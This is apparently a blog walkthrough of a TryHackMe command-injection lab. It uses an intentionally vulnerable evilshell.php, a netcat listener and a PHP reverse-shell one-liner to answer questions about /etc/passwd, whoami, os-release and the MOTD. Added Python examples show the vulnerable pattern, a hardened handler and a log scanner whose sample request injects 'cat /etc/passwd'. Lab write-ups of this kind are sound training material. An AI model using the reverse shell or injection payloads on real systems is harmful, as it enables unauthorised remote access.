TryHackMe-OWASP Top 10-Command Injection Practical

fatih
4 min read · Jul 8, 2021


#1 First, we run the machine we will use.

#2 About a minute later, once the machine is reachable, we connect using the configuration file we downloaded earlier, as shown below.

Note: you can click here to download your own configuration file.

#3 After the machine starts, we append /evilshell.php to the given IP address, enter that URL in the browser's address bar and press enter.

We then land on a vulnerable site. We can enter commands through the interface it provides.

However, since the site is vulnerable, it is more convenient to get a reverse shell back to our own Kali machine and continue from there. Still, remember that you can also run commands through the site's interface.
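The defect that makes evilshell.php work is the application passing request input to a shell. The following is an added Python example (the room's app is PHP; this is not its code and not the author's) that puts the vulnerable pattern beside a hardened handler with a tool allowlist and shell=False, and adds a scanner that picks such attempts out of constructed access-log lines. The `cmd` parameter name and the log lines are constructed for the example.

```python
"""Command injection: the vulnerable pattern, a hardened handler, and log-based
detection. Added example, not the room's PHP code."""
import re
import subprocess
from urllib.parse import urlparse, unquote

# --- vulnerable form (constructed; only built here, never executed) ----------
def build_vulnerable_command(target):
    """Equivalent of passthru("ping -c 1 " . $_GET["target"]) in PHP: the
    request value is concatenated into one string that /bin/sh will parse, so
    ';', '|', '&&', backticks and $(...) inside it change what actually runs."""
    return "ping -c 1 " + target

# --- hardened form -----------------------------------------------------------
# Allowlist of tools the endpoint may run, each as a fixed argv prefix.
ALLOWED_TOOLS = {
    "ping": ["ping", "-c", "1"],
    "host": ["host"],
}
# Hostname or dotted-quad IPv4 only: no whitespace, no shell metacharacters.
TARGET_RE = re.compile(r"[A-Za-z0-9.-]{1,253}")

def validate_target(target):
    return TARGET_RE.fullmatch(target) is not None

def build_safe_argv(tool, target):
    """Reject anything outside the allowlist before touching subprocess."""
    if tool not in ALLOWED_TOOLS:
        raise ValueError("tool not allowed: %r" % tool)
    if not validate_target(target):
        raise ValueError("invalid target: %r" % target)
    return ALLOWED_TOOLS[tool] + [target]

def run_safe(tool, target):
    """shell=False hands argv straight to execve; nothing is re-parsed by sh."""
    argv = build_safe_argv(tool, target)
    proc = subprocess.run(argv, shell=False, capture_output=True, text=True, timeout=10)
    return proc.stdout

# --- detection: shell metacharacters in decoded query strings ---------------
SHELL_META = re.compile(r"[;|&`$<>\n]")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+)')

def flag_injection_attempts(log_lines):
    """Return (line_number, decoded_query) for requests whose query string
    contains shell metacharacters after URL-decoding. evilshell.php accepts
    whole commands by design, so this targets the usual case of an endpoint
    that expects a single argument and receives a chained command instead."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = unquote(urlparse(m.group(1)).query)
        if SHELL_META.search(query):
            hits.append((n, query))
    return hits

# Constructed sample access-log lines; 'cmd' is a placeholder parameter name.
SAMPLE_LOG = [
    '10.0.0.5 - - [08/Jul/2021:10:00:01 +0000] "GET /evilshell.php?cmd=ls HTTP/1.1" 200 512',
    '10.0.0.5 - - [08/Jul/2021:10:00:07 +0000] "GET /evilshell.php?cmd=127.0.0.1%3Bcat%20%2Fetc%2Fpasswd HTTP/1.1" 200 2048',
    '10.0.0.9 - - [08/Jul/2021:10:00:09 +0000] "GET /index.php HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    print(build_vulnerable_command("127.0.0.1; id"))  # the chained string a shell would run
    print(build_safe_argv("ping", "10.10.10.5"))
    try:
        build_safe_argv("ping", "127.0.0.1; id")
    except ValueError as err:
        print("rejected:", err)
    print(flag_injection_attempts(SAMPLE_LOG))  # [(2, 'cmd=127.0.0.1;cat /etc/passwd')]
```

The allowlist plus argv list is the fix; the metacharacter filter is only a detection aid, since an endpoint that legitimately takes free-form input cannot be made safe by filtering alone.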

#4 Now we listen on port 1414 with netcat.

Then, while netcat is listening on that port, we enter the PHP reverse shell one-liner below into the site and press enter.

php -r '$sock=fsockopen("your_ip_address",port_number);exec("/bin/sh -i <&3 >&3 2>&3");'

Don't forget to replace the IP address and port in the PHP code above with your own.

After getting a reverse shell, we can start solving the questions.

#Answer 1

What strange text file is in the website root directory?

Entering the ls command shows the answer to this question: dr pepper.

#Answer 2

How many non-root/non-service/non-daemon users are there?

For this question we need to open the passwd file in the /etc folder, because user and service account information is kept in this file.

Looking through it, we found no users that are non-root/non-service/non-daemon. The answer is 0.

#Answer 3

What user is this app running as?

A whoami query is enough to find the user the application is running as. We see that the answer is www-data.

#Answer 4

What is the user’s shell set as?

To find out what the user's shell is set to, we use the /etc/passwd file we looked at in the previous questions. There we see that www-data's shell is set to /usr/sbin/nologin, so the answer is /usr/sbin/nologin. Note that nologin only blocks interactive logins through login or SSH; it does not stop the web server process from spawning /bin/sh, which is why our reverse shell still works as this user.

#Answer 5

What version of Ubuntu is running?

To find the running version of Ubuntu, we can open the os-release file in the /etc folder, which holds general information about the installed release. According to the information in the file, the version of Ubuntu is 18.04.4.

So we can say that the answer is 18.04.4
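Answers 2, 4 and 5 all come down to reading two files in /etc. The following is an added Python example (not the room's files and not the author's code) that does the same checks in code: it parses constructed /etc/passwd and /etc/os-release contents, counts regular users, looks up a user's shell, and pulls the point release out of os-release. The regular-user UID range (1000 to 60000) is assumed from Debian/Ubuntu's /etc/login.defs defaults; other distributions use different bounds.

```python
"""Added example: reading /etc/passwd and /etc/os-release in code, with
constructed sample file contents so it runs offline. Not the room's files."""
import re

# Constructed /etc/passwd excerpt mimicking a small Ubuntu web host.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
"""

# Constructed /etc/os-release for an 18.04.4 box.
SAMPLE_OS_RELEASE = """\
NAME="Ubuntu"
VERSION="18.04.4 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.4 LTS"
VERSION_ID="18.04"
"""

# Shells that mark an account as not meant for interactive login.
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false"}

def parse_passwd(text):
    """Parse passwd lines into dicts; skip comments and malformed lines."""
    users = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, _pw, uid, gid, gecos, home, shell = fields
        users.append({"name": name, "uid": int(uid), "gid": int(gid),
                      "gecos": gecos, "home": home, "shell": shell})
    return users

def human_users(users, uid_min=1000, uid_max=60000):
    """Answer 2: non-root/non-service/non-daemon accounts. Assumes the
    Debian/Ubuntu login.defs defaults (UID_MIN 1000, UID_MAX 60000) and treats
    a nologin shell as a service account even inside that range."""
    return [u for u in users
            if uid_min <= u["uid"] <= uid_max and u["shell"] not in NOLOGIN_SHELLS]

def shell_for(users, name):
    """Answer 4: the seventh passwd field for the named user, or None."""
    for u in users:
        if u["name"] == name:
            return u["shell"]
    return None

def parse_os_release(text):
    """Minimal os-release parser: KEY=value, value optionally quoted."""
    info = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        value = value.strip()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]
        info[key] = value
    return info

def ubuntu_point_release(info):
    """Answer 5: VERSION_ID only carries 18.04; the point release (18.04.4)
    is the leading dotted number in VERSION."""
    m = re.match(r"\d+(?:\.\d+)+", info.get("VERSION", ""))
    return m.group(0) if m else info.get("VERSION_ID")

if __name__ == "__main__":
    users = parse_passwd(SAMPLE_PASSWD)
    print("human users:", [u["name"] for u in human_users(users)])  # []
    print("www-data shell:", shell_for(users, "www-data"))  # /usr/sbin/nologin
    print("release:", ubuntu_point_release(parse_os_release(SAMPLE_OS_RELEASE)))  # 18.04.4
```

On a real host, replace the sample strings with `open("/etc/passwd").read()` and `open("/etc/os-release").read()`; the UID bounds are the one thing to adjust per distribution.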

#Answer 6

Print out the MOTD. What favorite beverage is shown?

Looking in the /etc folder for the MOTD mentioned in the question, we find a directory called update-motd.d.

When we list this directory, the file named 00-header attracts our attention, because 00-header was in the hint next to the question.

Reading 00-header gives us the answer to our question: dr pepper.

So we answered all the questions.

In this exercise we have seen a little of how important the /etc folder is.

Thank you for taking the time to read my article. I hope it was helpful.
